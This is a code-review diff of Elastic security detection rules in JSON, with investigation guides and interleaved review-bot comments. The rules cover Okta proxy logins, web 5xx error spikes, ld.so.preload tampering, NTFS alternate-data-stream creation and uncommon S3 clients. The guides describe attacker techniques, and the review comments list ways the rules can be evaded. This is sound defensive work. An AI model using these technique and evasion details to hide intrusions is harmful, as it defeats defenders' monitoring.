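Review bot: The LogMeIn exclusion at the end of the query (`not (process.pe.original_file_name : (...) and process.code_signature.subject_name : "LogMeIn, Inc.")`) relies on the signer subject alone; a signature that fails validation still carries a subject name, so the exclusion also suppresses alerts for untrusted signatures, and it should be narrowed with `and process.code_signature.trusted : true` for the data sources that populate that field. The description and the new `setup` text also state that first-time-seen child processes of RMM tools are detected, but `new_terms_fields` is only `host.id`, so as I read new-terms semantics the rule alerts once per host within the 7-day history window and a later RMM process or child on an already-seen host will not fire; either extend `new_terms_fields` with `process.name` (or `process.parent.name`) or reword the description and setup to say the alert fires on the first matching process per host. The `process.parent.name` list at the end of the query lacks `"Syncro.Installer.exe"`, which both `process.name` lists carry; since the three lists otherwise mirror each other this looks like an oversight rather than a deliberate difference.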
@@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the first occurrence of an Okta user session started via a proxy.", - "history_window_start": "now-7d", - "index": [ - "filebeat-*", - "logs-okta*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "First Occurrence of Okta User Session Started via Proxy", - "new_terms_fields": [ - "okta.actor.id", - "cloud.account.id" - ], - "note": "## Triage and analysis\n\n### Investigating First Occurrence of Okta User Session Started via Proxy\n\nThis rule detects the first occurrence of an Okta user session started via a proxy. This rule is designed to help identify suspicious authentication behavior that may be indicative of an attacker attempting to gain access to an Okta account while remaining anonymous. This rule leverages the New Terms rule type feature where the `okta.actor.id` value is checked against the previous 7 days of data to determine if the value has been seen before for this activity.\n\n#### Possible investigation steps:\n- Identify the user involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the client used by the actor. 
Review the `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Examine the `okta.debug_context.debug_data.flattened` field for more information about the proxy used.\n- Review the `okta.request.ip_chain` field for more information about the geographic location of the proxy.\n- Review the past activities of the actor involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n\n### Response and remediation:\n- Review the profile of the user involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting the user's password and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the user.\n- If the user is not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.", - "query": "event.dataset:okta.system and okta.event_type: (user.session.start or user.authentication.verify) and okta.security_context.is_proxy:true and not okta.actor.id: okta*\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://developer.okta.com/docs/reference/api/system-log/#issuer-object", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - 
"https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "okta.actor.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "okta.event_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "okta.security_context.is_proxy", - "type": "boolean" - } - ], - "risk_score": 47, - "rule_id": "6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Tactic: Initial Access", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1133", - "name": "External Remote Services", - "reference": "https://attack.mitre.org/techniques/T1133/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 207 - }, - "id": "6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_3.json b/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_3.json new file mode 100644 index 00000000000..f798e35660d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_3.json 
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Potential Spike in Error Response Codes", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Potential Spike in Error Response Codes\n\nThis rule detects bursts of 5xx errors (500\u2013504) from GET traffic, highlighting abnormal server behavior that accompanies active scanning or fuzzing and exposes fragile code paths or misconfigured proxies. 
Attackers sweep common and generated endpoints while mutating query params and headers\u2014path traversal, template syntax, large payloads\u2014to repeatedly force backend exceptions and gateway timeouts, enumerate which routes fail, and pinpoint inputs that leak stack traces or crash components for follow-on exploitation.\n\n### Possible investigation steps\n\n- Plot error rates per minute by server and client around the alert window to confirm the spike, determine scope, and separate a single noisy client from a platform-wide issue.\n- Aggregate the failing URL paths and query strings from the flagged client and look for enumeration sequences, traversal encoding, template injection markers, or oversized inputs indicative of fuzzing.\n- Examine User-Agent, Referer, header mix, and TLS JA3 for generic scanner signatures or reuse across multiple clients, and enrich the originating IP with reputation and hosting-provider attribution.\n- Correlate the timeframe with reverse proxy/WAF/IDS and application error logs or stack traces to identify which routes threw exceptions or timeouts and whether they align with the client\u2019s input patterns.\n- Validate backend and dependency health (upstreams, databases, caches, deployments) to rule out infrastructure regressions, then compare whether only the suspicious client experiences disproportionate failures.\n\n### False positive analysis\n\n- A scheduled deployment or upstream dependency issue can cause normal GET traffic to fail with 502/503/504, and many users egressing through a shared NAT or reverse proxy may be aggregated as one source IP that triggers the spike.\n- An internal health-check, load test, or site crawler running from a single host can rapidly traverse endpoints and induce 500 errors on fragile routes, mimicking scanner-like behavior without malicious intent.\n\n### Response and remediation\n\n- Immediately rate-limit or block the originating client(s) at the edge (reverse proxy/WAF) using the observed 
source IPs, User-Agent/TLS fingerprints, and the failing URL patterns generating 5xx bursts.\n- Drain the origin upstream(s) showing repeated 500/502/503/504 on the probed routes, roll back the latest deployment or config change for those services, and disable any unstable endpoint or plugin that is crashing under input fuzzing.\n- Restart affected application workers and proxies, purge bad cache entries, re-enable traffic gradually with canary percentage, and confirm normal response rates via synthetic checks against the previously failing URLs.\n- Escalate to Security Operations and Incident Response if 5xx spikes persist after blocking or if error pages expose stack traces, credentials, or admin route disclosures, or if traffic originates from multiple global hosting ASNs.\n- Deploy targeted WAF rules for path traversal and injection markers seen in the URLs, enforce per-IP and per-route rate limits, tighten upstream timeouts/circuit breakers, and replace verbose error pages with generic responses that omit stack details.\n- Add bot management and IP reputation blocking at the CDN/edge, lock down unauthenticated access to admin/debug routes, and instrument alerts that trigger on sustained 5xx bursts per client and per route with automatic edge throttling.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n| where\n http.request.method == \"GET\" and\n http.response.status_code in (\n 500, // Internal Server Error\n 502, // Bad Gateway\n 503, // Service Unavailable\n 504 // Gateway Timeout\n )\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| keep\n @timestamp,\n event.dataset,\n http.request.method,\n http.response.status_code,\n source.ip,\n agent.id,\n agent.name,\n Esql.url_original_to_lower,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.http_response_status_code_count = count(http.response.status_code),\n 
Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.http_request_method_values = values(http.request.method),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.url_path_values = values(Esql.url_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.http_response_status_code_count > 10\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_request_method_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "6fa3abe3-9cd8-41de-951b-51ed8f710523", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: 
Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "6fa3abe3-9cd8-41de-951b-51ed8f710523_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_211.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_211.json deleted file mode 100644 index e8204552b64..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_211.json +++ /dev/null 
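Review bot: The `stats` clause of the ES|QL query assigns `Esql.http_response_status_code_values = values(http.response.status_code)` twice, once directly after `Esql.http_response_status_code_count` and again after `Esql.http_request_method_values`; drop one of them so the output column is defined once, since whether the duplicate is rejected or silently shadowed depends on the stack version and a new rule should not depend on either. `Esql.http_response_status_code_count = count(http.response.status_code)` is also always equal to `Esql.event_count` here, because the preceding `where` keeps only rows whose status code is in the 5xx set, so the final filter could read `Esql.event_count > 10` and the redundant column be removed from both the query and `required_fields`. The `note` string starts with a stray space before `## Triage and analysis`, which the other rule documents in this diff do not have; trim it so the guide renders with a proper heading.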
@@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*", - "endgame-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Modification of Dynamic Linker Preload Shared Object", - "new_terms_fields": [ - "host.id", - "user.id", - "process.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Modification of Dynamic Linker Preload Shared Object\n\nThe dynamic linker preload mechanism in Linux, via `/etc/ld.so.preload`, allows preloading of shared libraries, influencing how executables load dependencies. Adversaries exploit this by inserting malicious libraries, hijacking execution flow for privilege escalation. 
The detection rule monitors changes to this file, excluding benign processes, to identify unauthorized modifications indicative of such abuse.\n\n### Possible investigation steps\n\n- Review the alert details to confirm the file path involved is /etc/ld.so.preload and verify the event action is one of the specified actions: updated, renamed, or file_rename_event.\n- Identify the process responsible for the modification by examining the process.name field, ensuring it is not one of the excluded processes (wine or oneagentinstallaction).\n- Investigate the process that triggered the alert by gathering additional context such as process ID, command line arguments, and parent process to understand its origin and purpose.\n- Check the modification timestamp and correlate it with other system events or logs to identify any suspicious activity or patterns around the time of the modification.\n- Analyze the contents of /etc/ld.so.preload to determine if any unauthorized or suspicious libraries have been added, and assess their potential impact on the system.\n- Review user accounts and permissions associated with the process to determine if there has been any unauthorized access or privilege escalation attempt.\n- If malicious activity is confirmed, isolate the affected system and follow incident response procedures to mitigate the threat and prevent further exploitation.\n\n### False positive analysis\n\n- Legitimate software installations or updates may modify /etc/ld.so.preload. To handle this, monitor the process names associated with these activities and consider adding them to the exclusion list if they are verified as benign.\n- System management tools like configuration management software might update /etc/ld.so.preload as part of routine operations. Identify these tools and exclude their process names from the detection rule to prevent false alerts.\n- Custom scripts or administrative tasks executed by trusted users could inadvertently trigger the rule. 
Review these scripts and, if necessary, exclude their process names or user accounts from the detection criteria.\n- Security agents or monitoring tools that interact with system files might cause false positives. Verify these tools' activities and exclude their process names if they are known to be safe and necessary for system operations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further exploitation or lateral movement by the adversary.\n- Terminate any suspicious processes that are not part of the baseline or known benign applications, especially those related to the modification of `/etc/ld.so.preload`.\n- Restore the `/etc/ld.so.preload` file from a known good backup to ensure no malicious libraries are preloaded.\n- Conduct a thorough review of recent system changes and installed packages to identify any unauthorized software or modifications that may have facilitated the attack.\n- Escalate the incident to the security operations team for a deeper forensic analysis to determine the scope of the compromise and identify any additional affected systems.\n- Implement additional monitoring on the affected system and similar environments to detect any further attempts to modify the dynamic linker preload file.\n- Review and enhance access controls and permissions on critical system files like `/etc/ld.so.preload` to prevent unauthorized modifications in the future.", - "query": "host.os.type:linux and event.category:file and event.action:(file_rename_event or rename or renamed or updated) and\nnot event.type:deletion and file.path:/etc/ld.so.preload and\nprocess.name:(* and not (oneagentinstallaction or passwd or wine))\n", - "references": [ - "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", 
- "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 211 - }, - "id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f_211", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_322.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_322.json new file mode 100644 index 00000000000..37332c33b9e --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_322.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious creation of Alternate Data Streams on highly targeted files using a script or command interpreter. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Creation - Alternate Data Stream", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. 
Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services 
WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all 
compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"mshta.exe\", \"wscript.exe\", \"node.exe\", \"python*.exe\") and\n file.extension in~ (\n \"pdf\", \"dll\", \"exe\", \"dat\", \"com\", \"bat\", \"cmd\", \"sys\", \"vbs\", \"vbe\", \"ps1\", \"hta\", \"txt\", \"js\", \"jse\",\n \"wsh\", \"wsf\", \"sct\", \"docx\", \"doc\", \"xlsx\", \"xls\", \"pptx\", \"ppt\", \"rtf\", \"gif\", \"jpg\", \"png\", \"bmp\", \"img\", \"iso\"\n ) and\n file.path : \"C:\\\\*:*\" and\n not file.name :(\"*:$DATA\", \"*PG$Secure\", \"*Zone.Identifier\", \"*com.apple.lastuseddate#PS\", \"*com.apple.provenance\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 
73, + "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 322 + }, + "id": "71bccb61-e19b-452f-b104-79a60e546a95_322", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1.json b/packages/security_detection_engine/kibana/security_rule/73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1.json new file mode 100644 index 00000000000..33a305d49ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1.json 
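Review bot: The interpreter list in `process.name` leaves out `cscript.exe` and `pwsh.exe`, so a stream written via `cscript //nologo x.vbs` or PowerShell 7 never matches, and `file.path : "C:\\*:*"` only covers the system drive, so ADS created on a second NTFS volume are missed as well. Suggest `process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "node.exe", "python*.exe")` and `file.path : "?:\\*:*"`. Because `process.name` comes from the on-disk filename, a renamed copy of any of these interpreters also evades the rule; matching on `process.pe.original_file_name` where the data source supplies it would be more robust. The guide's last investigation step says "after the registry modification", but this is a file-creation rule, so "after the alternate data stream was written" is what is meant.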
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows.", + "false_positives": [ + "Some organizations may have legitimate use cases for S3 Browser or Cyberduck, particularly in development, data migration, or backup scenarios. Verify whether the IAM principal, source network, and accessed buckets align with approved workflows. Unexpected activity from these clients, especially accessing sensitive buckets, should be investigated." + ], + "from": "now-6m", + "history_window_start": "now-7d", + "index": [ + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.arn", + "aws.cloudtrail.resources.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS API Activity from Uncommon S3 Client by Rare User", + "new_terms_fields": [ + "cloud.account.id", + "user.name" + ], + "note": "## Triage and Analysis\n\n### Investigating AWS API Activity from Uncommon S3 Client by Rare User\n\nS3 Browser and Cyberduck are graphical clients for Amazon S3 that allow users to browse, upload, download, and manage S3 objects. 
